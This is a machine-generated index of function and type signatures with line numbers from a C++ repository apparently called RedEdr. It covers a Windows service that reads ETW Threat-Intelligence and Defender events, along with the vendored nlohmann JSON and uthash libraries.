function Unicodestring2wcharAlloc (line 50) | void Unicodestring2wcharAlloc(const UNICODE_STRING* ustr, wchar_t* dest,...
function NTSTATUS (line 65) | NTSTATUS WcharToAscii(const wchar_t* wideStr, SIZE_T wideLength, char* a...
function JsonEscape (line 87) | void JsonEscape(char* str, size_t buffer_size) {
FILE: RedEdrPplService/RedEdrPplService.cpp
function ShutdownService (line 15) | void ShutdownService() {
function VOID (line 42) | VOID WINAPI ServiceCtrlHandler(DWORD ctrlCode)
function VOID (line 66) | VOID WINAPI ServiceMain(DWORD argc, LPTSTR* argv)
function DWORD (line 134) | DWORD ServiceEntry()
function main (line 154) | int main(INT argc, CHAR** argv)
FILE: RedEdrPplService/control.cpp
function DWORD (line 22) | DWORD WINAPI ServiceControlPipeThread(LPVOID param) {
function StartControl (line 106) | void StartControl() {
function StopControl (line 122) | void StopControl() {
function rededr_remove_service (line 148) | void rededr_remove_service() {
function DWORD (line 158) | DWORD start_child_process(wchar_t* childCMD)
FILE: RedEdrPplService/emitter.cpp
function BOOL (line 11) | BOOL ConnectEmitterPipe() {
function SendEmitterPipe (line 22) | void SendEmitterPipe(char* buffer) {
function DisconnectEmitterPipe (line 27) | void DisconnectEmitterPipe() {
FILE: RedEdrPplService/etwtihandler.cpp
function SetDefenderTraceConfig (line 22) | void SetDefenderTraceConfig(BOOL enabled, const std::vector<std::string>...
function event_callback (line 27) | void event_callback(const EVENT_RECORD& record, const krabs::trace_conte...
function event_callback_defendertrace (line 61) | void event_callback_defendertrace(const EVENT_RECORD& record, const krab...
FILE: RedEdrPplService/etwtireader.cpp
function StartEtwtiReader (line 15) | void StartEtwtiReader() {
function ShutdownEtwtiReader (line 71) | void ShutdownEtwtiReader() {
FILE: RedEdrPplService/logging.cpp
function InitializeFileLogging (line 18) | static void InitializeFileLogging() {
function WriteToLogFile (line 39) | static void WriteToLogFile(const char* message) {
function LOG_A (line 87) | void LOG_A(int verbosity, const char* format, ...)
function LOG_W (line 101) | void LOG_W(int verbosity, const wchar_t* format, ...)
function CleanupFileLogging (line 120) | void CleanupFileLogging() {
FILE: RedEdrPplService/uthash.h
type UT_hash_bucket (line 1072) | typedef struct UT_hash_bucket {
type UT_hash_table (line 1096) | typedef struct UT_hash_table {
type UT_hash_handle (line 1129) | typedef struct UT_hash_handle {
FILE: RedEdrShared/etw_krabs.cpp
function KrabsEtwEventToJsonStr (line 12) | nlohmann::json KrabsEtwEventToJsonStr(const EVENT_RECORD& record, krabs:...
FILE: RedEdrShared/json.hpp
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 247) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 258) | NLOHMANN_JSON_NAMESPACE_END
type would_call_std_ (line 2814) | struct would_call_std_
type value_t (line 2872) | enum class value_t : std::uint8_t
function NLOHMANN_JSON_NAMESPACE_END (line 2937) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3031) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3077) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3268) | NLOHMANN_JSON_NAMESPACE_BEGIN
class json_pointer (line 3417) | class json_pointer
type ordered_map (line 3428) | struct ordered_map
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3439) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4245) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 4374) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_END (line 4608) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4654) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4662) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4677) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 5192) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 5376) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 5425) | NLOHMANN_JSON_NAMESPACE_BEGIN
type adl_serializer (line 5853) | struct adl_serializer
method from_json (line 5858) | static auto from_json(BasicJsonType&& j, TargetType& val) noexcept(
method from_json (line 5868) | static auto from_json(BasicJsonType&& j) noexcept(
method to_json (line 5878) | static auto to_json(BasicJsonType& j, TargetType&& val) noexcept(
function set_subtype (line 5964) | void set_subtype(subtype_type subtype_) noexcept
function subtype_type (line 5972) | constexpr subtype_type subtype() const noexcept
function has_subtype (line 5979) | constexpr bool has_subtype() const noexcept
function clear_subtype (line 5986) | void clear_subtype() noexcept
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 6025) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 6197) | NLOHMANN_JSON_NAMESPACE_BEGIN
function json_sax_dom_parser (line 6844) | explicit json_sax_dom_parser(BasicJsonType& r, const bool allow_exceptio...
function json_sax_dom_parser (line 6850) | json_sax_dom_parser(const json_sax_dom_parser&) = delete;
function json_sax_dom_parser (line 6851) | json_sax_dom_parser(json_sax_dom_parser&&) = default;
function null (line 6856) | bool null()
function boolean (line 6862) | bool boolean(bool val)
function number_integer (line 6868) | bool number_integer(number_integer_t val)
function number_unsigned (line 6874) | bool number_unsigned(number_unsigned_t val)
function number_float (line 6880) | bool number_float(number_float_t val, const string_t& /*unused*/)
function string (line 6886) | bool string(string_t& val)
function binary (line 6892) | bool binary(binary_t& val)
function start_object (line 6898) | bool start_object(std::size_t len)
function key (line 6910) | bool key(string_t& val)
function end_object (line 6920) | bool end_object()
function start_array (line 6930) | bool start_array(std::size_t len)
function end_array (line 6942) | bool end_array()
function parse_error (line 6953) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/,
function is_errored (line 6965) | constexpr bool is_errored() const
class json_sax_dom_callback_parser (line 7014) | class json_sax_dom_callback_parser
method json_sax_dom_callback_parser (line 7025) | json_sax_dom_callback_parser(BasicJsonType& r,
method json_sax_dom_callback_parser (line 7034) | json_sax_dom_callback_parser(const json_sax_dom_callback_parser&) = de...
method json_sax_dom_callback_parser (line 7035) | json_sax_dom_callback_parser(json_sax_dom_callback_parser&&) = default;
method json_sax_dom_callback_parser (line 7036) | json_sax_dom_callback_parser& operator=(const json_sax_dom_callback_pa...
method json_sax_dom_callback_parser (line 7037) | json_sax_dom_callback_parser& operator=(json_sax_dom_callback_parser&&...
method null (line 7040) | bool null()
method boolean (line 7046) | bool boolean(bool val)
method number_integer (line 7052) | bool number_integer(number_integer_t val)
method number_unsigned (line 7058) | bool number_unsigned(number_unsigned_t val)
method number_float (line 7064) | bool number_float(number_float_t val, const string_t& /*unused*/)
method string (line 7070) | bool string(string_t& val)
method binary (line 7076) | bool binary(binary_t& val)
method start_object (line 7082) | bool start_object(std::size_t len)
method key (line 7100) | bool key(string_t& val)
method end_object (line 7117) | bool end_object()
method start_array (line 7153) | bool start_array(std::size_t len)
method end_array (line 7170) | bool end_array()
method parse_error (line 7203) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/,
method is_errored (line 7215) | constexpr bool is_errored() const
method handle_value (line 7237) | std::pair<bool, BasicJsonType*> handle_value(Value&& v, const bool ski...
class json_sax_acceptor (line 7321) | class json_sax_acceptor
method null (line 7330) | bool null()
method boolean (line 7335) | bool boolean(bool /*unused*/)
method number_integer (line 7340) | bool number_integer(number_integer_t /*unused*/)
method number_unsigned (line 7345) | bool number_unsigned(number_unsigned_t /*unused*/)
method number_float (line 7350) | bool number_float(number_float_t /*unused*/, const string_t& /*unused*/)
method string (line 7355) | bool string(string_t& /*unused*/)
method binary (line 7360) | bool binary(binary_t& /*unused*/)
method start_object (line 7365) | bool start_object(std::size_t /*unused*/ = static_cast<std::size_t>(-1))
method key (line 7370) | bool key(string_t& /*unused*/)
method end_object (line 7375) | bool end_object()
method start_array (line 7380) | bool start_array(std::size_t /*unused*/ = static_cast<std::size_t>(-1))
method end_array (line 7385) | bool end_array()
method parse_error (line 7390) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/...
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 7429) | NLOHMANN_JSON_NAMESPACE_BEGIN
function reset (line 8725) | void reset() noexcept
function char_int_type (line 8742) | char_int_type get()
function unget (line 8779) | void unget()
function add (line 8806) | void add(char_int_type c)
function number_unsigned_t (line 8823) | constexpr number_unsigned_t get_number_unsigned() const noexcept
function number_float_t (line 8829) | constexpr number_float_t get_number_float() const noexcept
function string_t (line 8835) | string_t& get_string()
function position_t (line 8845) | constexpr position_t get_position() const noexcept
function get_token_string (line 8853) | std::string get_token_string() const
function JSON_HEDLEY_RETURNS_NON_NULL (line 8877) | JSON_HEDLEY_RETURNS_NON_NULL
function skip_bom (line 8891) | bool skip_bom()
function skip_whitespace (line 8905) | void skip_whitespace()
function token_type (line 8913) | token_type scan()
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 9062) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 9202) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12226) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12750) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 12866) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12921) | NLOHMANN_JSON_NAMESPACE_BEGIN
function pointer (line 13225) | pointer operator->() const
function iter_impl (line 13267) | iter_impl operator++(int)& // NOLINT(cert-dcl21-cpp)
function iter_impl (line 13278) | iter_impl& operator++()
function iter_impl (line 13318) | iter_impl operator--(int)& // NOLINT(cert-dcl21-cpp)
function iter_impl (line 13329) | iter_impl& operator--()
function iter_impl (line 13477) | iter_impl& operator+=(difference_type i)
function iter_impl (line 13514) | iter_impl& operator-=(difference_type i)
function iter_impl (line 13523) | iter_impl operator+(difference_type i) const
function friend (line 13534) | friend iter_impl operator+(difference_type i, const iter_impl& it)
function iter_impl (line 13545) | iter_impl operator-(difference_type i) const
function difference_type (line 13556) | difference_type operator-(const iter_impl& other) const
function reference (line 13585) | reference operator[](difference_type n) const
function reference (line 13639) | reference value() const
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13674) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13808) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13869) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_BASIC_JSON_TPL_DECLARATION (line 13889) | NLOHMANN_BASIC_JSON_TPL_DECLARATION
function json_pointer (line 13901) | explicit json_pointer(const string_t& s = "")
function string_t (line 13908) | string_t to_string() const
function friend (line 13929) | friend std::ostream& operator<<(std::ostream& o, const json_pointer& ptr)
function json_pointer (line 13938) | json_pointer& operator/=(const json_pointer& ptr)
function json_pointer (line 13948) | json_pointer& operator/=(string_t token)
function json_pointer (line 13956) | json_pointer& operator/=(std::size_t array_idx)
function friend (line 13963) | friend json_pointer operator/(const json_pointer& lhs,
function friend (line 13971) | friend json_pointer operator/(const json_pointer& lhs, string_t token) /...
function friend (line 13978) | friend json_pointer operator/(const json_pointer& lhs, std::size_t array...
function json_pointer (line 13985) | json_pointer parent_pointer() const
function pop_back (line 13999) | void pop_back()
function string_t (line 14011) | const string_t& back() const
function push_back (line 14023) | void push_back(const string_t& token)
function push_back (line 14030) | void push_back(string_t&& token)
function empty (line 14037) | bool empty() const noexcept
function BasicJsonType (line 14114) | BasicJsonType& get_and_create(BasicJsonType& j) const
function BasicJsonType (line 14194) | BasicJsonType& get_unchecked(BasicJsonType* ptr) const
function BasicJsonType (line 14262) | BasicJsonType& get_checked(BasicJsonType* ptr) const
function BasicJsonType (line 14320) | const BasicJsonType& get_unchecked(const BasicJsonType* ptr) const
function BasicJsonType (line 14369) | const BasicJsonType& get_checked(const BasicJsonType* ptr) const
function contains (line 14418) | bool contains(const BasicJsonType* ptr) const
function split (line 14506) | static std::vector<string_t> split(const string_t& reference_string)
function BasicJsonType (line 14646) | static BasicJsonType
function convert (line 14675) | json_pointer<string_t> convert() const&
function convert (line 14682) | json_pointer<string_t> convert()&&
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 14849) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 14978) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 15106) | NLOHMANN_JSON_NAMESPACE_END
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 16973) | NLOHMANN_JSON_NAMESPACE_BEGIN
function NLOHMANN_JSON_NAMESPACE_END (line 18070) | NLOHMANN_JSON_NAMESPACE_END
function hex_bytes (line 18731) | static std::string hex_bytes(std::uint8_t byte)
function is_negative_number (line 18742) | bool is_negative_number(NumberType x)
function is_negative_number (line 18748) | bool is_negative_number(NumberType /*unused*/)
function dump_integer (line 18768) | void dump_integer(NumberType x)
function dump_float (line 18853) | void dump_float(number_float_t x)
function dump_float (line 18874) | void dump_float(number_float_t x, std::true_type /*is_ieee_single_or_dou...
function dump_float (line 18882) | void dump_float(number_float_t x, std::false_type /*is_ieee_single_or_do...
function decode (line 18954) | static std::uint8_t decode(std::uint8_t& state, std::uint32_t& codep, co...
function number_unsigned_t (line 18994) | number_unsigned_t remove_sign(number_unsigned_t x)
function number_unsigned_t (line 19009) | inline number_unsigned_t remove_sign(number_integer_t x) noexcept
function ordered_map (line 19096) | ordered_map() noexcept(noexcept(Container())) : Container{} {}
function ordered_map (line 19097) | explicit ordered_map(const Allocator& alloc) noexcept(noexcept(Container...
function ordered_map (line 19099) | ordered_map(It first, It last, const Allocator& alloc = Allocator())
function ordered_map (line 19102) | ordered_map(std::initializer_list<value_type> init, const Allocator& all...
function emplace (line 19106) | std::pair<iterator, bool> emplace(const key_type& key, T&& t)
function emplace (line 19121) | std::pair<iterator, bool> emplace(KeyType&& key, T&& t)
function T (line 19134) | T& operator[](const key_type& key)
function T (line 19141) | T& operator[](KeyType&& key)
function T (line 19146) | const T& operator[](const key_type& key) const
function T (line 19153) | const T& operator[](KeyType&& key) const
function T (line 19158) | T& at(const key_type& key)
function T (line 19173) | T& at(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-forward)
function T (line 19186) | const T& at(const key_type& key) const
function T (line 19201) | const T& at(KeyType&& key) const // NOLINT(cppcoreguidelines-missing-std...
function size_type (line 19214) | size_type erase(const key_type& key)
function size_type (line 19235) | size_type erase(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-f...
function iterator (line 19254) | iterator erase(iterator pos)
function iterator (line 19259) | iterator erase(iterator first, iterator last)
function size_type (line 19312) | size_type count(const key_type& key) const
function size_type (line 19326) | size_type count(KeyType&& key) const // NOLINT(cppcoreguidelines-missing...
function iterator (line 19338) | iterator find(const key_type& key)
function iterator (line 19352) | iterator find(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-for...
function const_iterator (line 19364) | const_iterator find(const key_type& key) const
function insert (line 19376) | std::pair<iterator, bool> insert(value_type&& value)
function insert (line 19381) | std::pair<iterator, bool> insert(const value_type& value)
function insert (line 19399) | void insert(InputIt first, InputIt last)
function NLOHMANN_JSON_NAMESPACE_BEGIN (line 19426) | NLOHMANN_JSON_NAMESPACE_BEGIN
function set_parents (line 20053) | void set_parents()
function iterator (line 20090) | iterator set_parents(iterator it, typename iterator::difference_type cou...
function reference (line 20103) | reference set_parent(reference j, std::size_t old_capacity = static_cast...
function basic_json (line 20165) | basic_json(const value_t v)
function basic_json (line 20173) | basic_json(std::nullptr_t = nullptr) noexcept // NOLINT(bugprone-excepti...
function basic_json (line 20185) | basic_json(CompatibleType&& val) noexcept(noexcept( // NOLINT(bugprone-f...
function basic_json (line 20199) | basic_json(const BasicJsonType& val)
function basic_json (line 20252) | basic_json(initializer_list_t init,
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20310) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20321) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20332) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20343) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20354) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20362) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 20370) | basic_json(size_type cnt, const basic_json& val) :
function basic_json (line 20382) | basic_json(InputIT first, InputIT last)
function basic_json (line 20491) | basic_json(const JsonRef& ref) : basic_json(ref.moved_or_copied()) {}
function basic_json (line 20495) | basic_json(const basic_json& other)
function basic_json (line 20564) | basic_json(basic_json&& other) noexcept
function basic_json (line 20581) | basic_json& operator=(basic_json other) noexcept (
function value_t (line 20644) | constexpr value_t type() const noexcept
function is_primitive (line 20651) | constexpr bool is_primitive() const noexcept
function is_structured (line 20658) | constexpr bool is_structured() const noexcept
function is_null (line 20665) | constexpr bool is_null() const noexcept
function is_boolean (line 20672) | constexpr bool is_boolean() const noexcept
function is_number (line 20679) | constexpr bool is_number() const noexcept
function is_number_integer (line 20686) | constexpr bool is_number_integer() const noexcept
function is_number_unsigned (line 20693) | constexpr bool is_number_unsigned() const noexcept
function is_number_float (line 20700) | constexpr bool is_number_float() const noexcept
function is_object (line 20707) | constexpr bool is_object() const noexcept
function is_array (line 20714) | constexpr bool is_array() const noexcept
function is_string (line 20721) | constexpr bool is_string() const noexcept
function is_binary (line 20728) | constexpr bool is_binary() const noexcept
function is_discarded (line 20735) | constexpr bool is_discarded() const noexcept
function object_t (line 20766) | object_t* get_impl_ptr(object_t* /*unused*/) noexcept
function object_t (line 20772) | constexpr const object_t* get_impl_ptr(const object_t* /*unused*/) const...
function array_t (line 20778) | array_t* get_impl_ptr(array_t* /*unused*/) noexcept
function array_t (line 20784) | constexpr const array_t* get_impl_ptr(const array_t* /*unused*/) const n...
function string_t (line 20790) | string_t* get_impl_ptr(string_t* /*unused*/) noexcept
function string_t (line 20796) | constexpr const string_t* get_impl_ptr(const string_t* /*unused*/) const...
function boolean_t (line 20802) | boolean_t* get_impl_ptr(boolean_t* /*unused*/) noexcept
function boolean_t (line 20808) | constexpr const boolean_t* get_impl_ptr(const boolean_t* /*unused*/) con...
function number_integer_t (line 20814) | number_integer_t* get_impl_ptr(number_integer_t* /*unused*/) noexcept
function number_integer_t (line 20820) | constexpr const number_integer_t* get_impl_ptr(const number_integer_t* /...
function number_unsigned_t (line 20826) | number_unsigned_t* get_impl_ptr(number_unsigned_t* /*unused*/) noexcept
function number_unsigned_t (line 20832) | constexpr const number_unsigned_t* get_impl_ptr(const number_unsigned_t*...
function number_float_t (line 20838) | number_float_t* get_impl_ptr(number_float_t* /*unused*/) noexcept
function number_float_t (line 20844) | constexpr const number_float_t* get_impl_ptr(const number_float_t* /*unu...
function binary_t (line 20850) | binary_t* get_impl_ptr(binary_t* /*unused*/) noexcept
function binary_t (line 20856) | constexpr const binary_t* get_impl_ptr(const binary_t* /*unused*/) const...
function ReferenceType (line 20873) | static ReferenceType get_ref_impl(ThisType& obj)
function get_ptr (line 20906) | constexpr auto get_ptr() const noexcept -> decltype(std::declval<const b...
function ValueType (line 20998) | ValueType get_impl(detail::priority_tag<1> /*unused*/) const noexcept(no...
function BasicJsonType (line 21023) | BasicJsonType get_impl(detail::priority_tag<2> /*unused*/) const
function basic_json (line 21046) | basic_json get_impl(detail::priority_tag<3> /*unused*/) const
function get_impl (line 21059) | constexpr auto get_impl(detail::priority_tag<4> /*unused*/) const noexcept
function get (line 21135) | auto get() noexcept -> decltype(std::declval<basic_json_t&>().template g...
function ValueType (line 21148) | ValueType& get_to(ValueType& v) const noexcept(noexcept(
function ValueType (line 21161) | ValueType& get_to(ValueType& v) const
function Array (line 21172) | Array get_to(T(&v)[N]) const // NOLINT(cppcoreguidelines-avoid-c-arrays,...
function ReferenceType (line 21184) | ReferenceType get_ref()
function ReferenceType (line 21195) | ReferenceType get_ref() const
function binary_t (line 21254) | binary_t& get_binary()
function binary_t (line 21266) | const binary_t& get_binary() const
function reference (line 21288) | reference at(size_type idx)
function const_reference (line 21311) | const_reference at(size_type idx) const
function reference (line 21334) | reference at(const typename object_t::key_type& key)
function reference (line 21354) | reference at(KeyType&& key)
function const_reference (line 21372) | const_reference at(const typename object_t::key_type& key) const
function const_reference (line 21392) | const_reference at(KeyType&& key) const
function reference (line 21410) | reference operator[](size_type idx)
function const_reference (line 21456) | const_reference operator[](size_type idx) const
function reference (line 21469) | reference operator[](typename object_t::key_type key)
function const_reference (line 21491) | const_reference operator[](const typename object_t::key_type& key) const
function reference (line 21507) | reference operator[](T* key)
function const_reference (line 21513) | const_reference operator[](T* key) const
function reference (line 21522) | reference operator[](KeyType&& key)
function const_reference (line 21546) | const_reference operator[](KeyType&& key) const
class ValueType (line 21572) | class ValueType
function ReturnType (line 21601) | ReturnType value(const typename object_t::key_type& key, ValueType&& def...
function ValueType (line 21627) | ValueType value(KeyType&& key, const ValueType& default_value) const
function ReturnType (line 21654) | ReturnType value(KeyType&& key, ValueType&& default_value) const
function ValueType (line 21677) | ValueType value(const json_pointer& ptr, const ValueType& default_value)...
function ReturnType (line 21702) | ReturnType value(const json_pointer& ptr, ValueType&& default_value) const
function ValueType (line 21726) | ValueType value(const ::nlohmann::json_pointer<BasicJsonType>& ptr, cons...
function ReturnType (line 21737) | ReturnType value(const ::nlohmann::json_pointer<BasicJsonType>& ptr, Val...
function reference (line 21744) | reference front()
function const_reference (line 21751) | const_reference front() const
function reference (line 21758) | reference back()
function const_reference (line 21767) | const_reference back() const
function IteratorType (line 21779) | IteratorType erase(IteratorType pos)
function IteratorType (line 21849) | IteratorType erase(IteratorType first, IteratorType last)
function erase_internal (line 21917) | private:
function size_type (line 21933) | size_type erase_internal(KeyType&& key)
function size_type (line 21965) | size_type erase(KeyType&& key)
function erase (line 21972) | void erase(const size_type idx)
function iterator (line 22001) | iterator find(const typename object_t::key_type& key)
function const_iterator (line 22015) | const_iterator find(const typename object_t::key_type& key) const
function iterator (line 22031) | iterator find(KeyType&& key)
function const_iterator (line 22047) | const_iterator find(KeyType&& key) const
function size_type (line 22061) | size_type count(const typename object_t::key_type& key) const
function size_type (line 22071) | size_type count(KeyType&& key) const
function contains (line 22079) | bool contains(const typename object_t::key_type& key) const
function contains (line 22088) | bool contains(KeyType&& key) const
function contains (line 22095) | bool contains(const json_pointer& ptr) const
function contains (line 22102) | bool contains(const typename ::nlohmann::json_pointer<BasicJsonType>& pt...
function iterator (line 22118) | iterator begin() noexcept
function const_iterator (line 22127) | const_iterator begin() const noexcept
function const_iterator (line 22134) | const_iterator cbegin() const noexcept
function iterator (line 22143) | iterator end() noexcept
function const_iterator (line 22152) | const_iterator end() const noexcept
function const_iterator (line 22159) | const_iterator cend() const noexcept
function reverse_iterator (line 22168) | reverse_iterator rbegin() noexcept
function const_reverse_iterator (line 22175) | const_reverse_iterator rbegin() const noexcept
function reverse_iterator (line 22182) | reverse_iterator rend() noexcept
function const_reverse_iterator (line 22189) | const_reverse_iterator rend() const noexcept
function const_reverse_iterator (line 22196) | const_reverse_iterator crbegin() const noexcept
function const_reverse_iterator (line 22203) | const_reverse_iterator crend() const noexcept
function iterator_wrapper (line 22215) | static iteration_proxy<iterator> iterator_wrapper(reference ref) noexcept
function iterator_wrapper (line 22226) | static iteration_proxy<const_iterator> iterator_wrapper(const_reference ...
function items (line 22233) | iteration_proxy<iterator> items() noexcept
function items (line 22240) | iteration_proxy<const_iterator> items() const noexcept
function empty (line 22256) | bool empty() const noexcept
function size_type (line 22295) | size_type size() const noexcept
function size_type (line 22334) | size_type max_size() const noexcept
function clear (line 22377) | void clear() noexcept
function push_back (line 22438) | void push_back(basic_json&& val)
function reference (line 22463) | reference operator+=(basic_json&& val)
function push_back (line 22471) | void push_back(const basic_json& val)
function reference (line 22495) | reference operator+=(const basic_json& val)
function push_back (line 22503) | void push_back(const typename object_t::value_type& val)
function reference (line 22526) | reference operator+=(const typename object_t::value_type& val)
function push_back (line 22534) | void push_back(initializer_list_t init)
function reference (line 22550) | reference operator+=(initializer_list_t init)
function reference (line 22559) | reference emplace_back(Args&& ... args)
function emplace (line 22584) | std::pair<iterator, bool> emplace(Args&& ... args)
function iterator (line 22616) | iterator insert_iterator(const_iterator pos, Args&& ... args)
function iterator (line 22635) | iterator insert(const_iterator pos, const basic_json& val)
function iterator (line 22655) | iterator insert(const_iterator pos, basic_json&& val)
function iterator (line 22662) | iterator insert(const_iterator pos, size_type cnt, const basic_json& val)
function iterator (line 22682) | iterator insert(const_iterator pos, const_iterator first, const_iterator...
function iterator (line 22713) | iterator insert(const_iterator pos, initializer_list_t ilist)
function insert (line 22733) | void insert(const_iterator first, const_iterator last)
function update (line 22758) | void update(const_reference j, bool merge_objects = false)
function update (line 22765) | void update(const_iterator first, const_iterator last, bool merge_object...
function swap (line 22812) | void swap(reference other) noexcept (
function friend (line 22829) | friend void swap(reference left, reference right) noexcept (
function swap (line 22841) | void swap(array_t& other) // NOLINT(bugprone-exception-escape,cppcoregui...
function swap (line 22857) | void swap(object_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
function swap (line 22873) | void swap(string_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
function swap (line 22889) | void swap(binary_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
function swap (line 22905) | void swap(typename binary_t::container_type& other) // NOLINT(bugprone-e...
function else (line 22994) | else if(compares_unordered(lhs, rhs))\
function compares_unordered (line 23023) | bool compares_unordered(const_reference rhs, bool inverse = false) const...
function friend (line 23136) | friend bool operator==(const_reference lhs, const_reference rhs) noexcept
function friend (line 23168) | friend bool operator!=(const_reference lhs, const_reference rhs) noexcept
function friend (line 23225) | friend bool operator<=(const_reference lhs, const_reference rhs) noexcept
function friend (line 23254) | friend bool operator>(const_reference lhs, const_reference rhs) noexcept
function friend (line 23284) | friend bool operator>=(const_reference lhs, const_reference rhs) noexcept
function friend (line 23325) | friend std::ostream& operator<<(std::ostream& o, const basic_json& j)
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23364) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23378) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 23392) | static basic_json parse(detail::span_input_adapter&& i,
function accept (line 23405) | static bool accept(InputType&& i,
function accept (line 23414) | static bool accept(IteratorType first, IteratorType last,
function accept (line 23422) | static bool accept(detail::span_input_adapter&& i,
function sax_parse (line 23432) | static bool sax_parse(InputType&& i, SAX* sax,
function sax_parse (line 23447) | static bool sax_parse(IteratorType first, IteratorType last, SAX* sax,
function sax_parse (line 23466) | static bool sax_parse(detail::span_input_adapter&& i, SAX* sax,
function JSON_HEDLEY_RETURNS_NON_NULL (line 23507) | JSON_HEDLEY_RETURNS_NON_NULL
type data (line 23539) | struct data
method data (line 23547) | data(const value_t v)
method data (line 23552) | data(size_type cnt, const basic_json& val)
method data (line 23558) | data() noexcept = default;
method data (line 23559) | data(data&&) noexcept = default;
method data (line 23560) | data(const data&) noexcept = delete;
method data (line 23561) | data& operator=(data&&) noexcept = delete;
method data (line 23562) | data& operator=(const data&) noexcept = delete;
function to_cbor (line 23596) | static void to_cbor(const basic_json& j, detail::output_adapter<std::uin...
function to_cbor (line 23603) | static void to_cbor(const basic_json& j, detail::output_adapter<char> o)
function to_msgpack (line 23610) | static std::vector<std::uint8_t> to_msgpack(const basic_json& j)
function to_msgpack (line 23619) | static void to_msgpack(const basic_json& j, detail::output_adapter<std::...
function to_msgpack (line 23626) | static void to_msgpack(const basic_json& j, detail::output_adapter<char> o)
function to_ubjson (line 23633) | static std::vector<std::uint8_t> to_ubjson(const basic_json& j,
function to_ubjson (line 23644) | static void to_ubjson(const basic_json& j, detail::output_adapter<std::u...
function to_ubjson (line 23652) | static void to_ubjson(const basic_json& j, detail::output_adapter<char> o,
function to_bjdata (line 23660) | static std::vector<std::uint8_t> to_bjdata(const basic_json& j,
function to_bjdata (line 23671) | static void to_bjdata(const basic_json& j, detail::output_adapter<std::u...
function to_bjdata (line 23679) | static void to_bjdata(const basic_json& j, detail::output_adapter<char> o,
function to_bson (line 23687) | static std::vector<std::uint8_t> to_bson(const basic_json& j)
function to_bson (line 23696) | static void to_bson(const basic_json& j, detail::output_adapter<std::uin...
function to_bson (line 23703) | static void to_bson(const basic_json& j, detail::output_adapter<char> o)
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23711) | JSON_HEDLEY_WARN_UNUSED_RESULT
function JSON_HEDLEY_WARN_UNUSED_RESULT (line 23727) | JSON_HEDLEY_WARN_UNUSED_RESULT
function basic_json (line 23743) | static basic_json from_cbor(const T* ptr, std::size_t len,
function basic_json (line 23753) | static basic_json from_cbor(detail::span_input_adapter&& i,
